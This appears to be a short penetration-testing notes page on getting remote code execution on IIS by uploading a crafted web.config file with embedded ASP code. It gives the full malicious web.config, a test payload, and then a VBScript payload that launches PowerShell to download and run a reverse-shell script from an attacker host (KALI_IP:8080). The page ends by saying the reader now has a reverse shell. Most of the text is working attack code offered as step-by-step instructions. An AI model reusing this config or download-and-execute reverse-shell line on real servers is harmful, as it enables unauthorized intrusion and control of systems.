aspx with web.config RCE vuln

If you have some kind of access to web root and upload files, but then when you access it you get an error like this. It's most likely vulnerable to the below attack. 

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

Upload this file via ftp and Access the file via http

It's showing “3" so remote code execution is possible!

changed the payload to

<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://KALI_IP:8080/Invoke-PowerShellTcp.ps1')")
%>

Host the http server on 8080 and visit the directory whatever the port of the reverse shell setting.

Now you should have a reverse shell.

Previousport 80Next389 LDAP

Last updated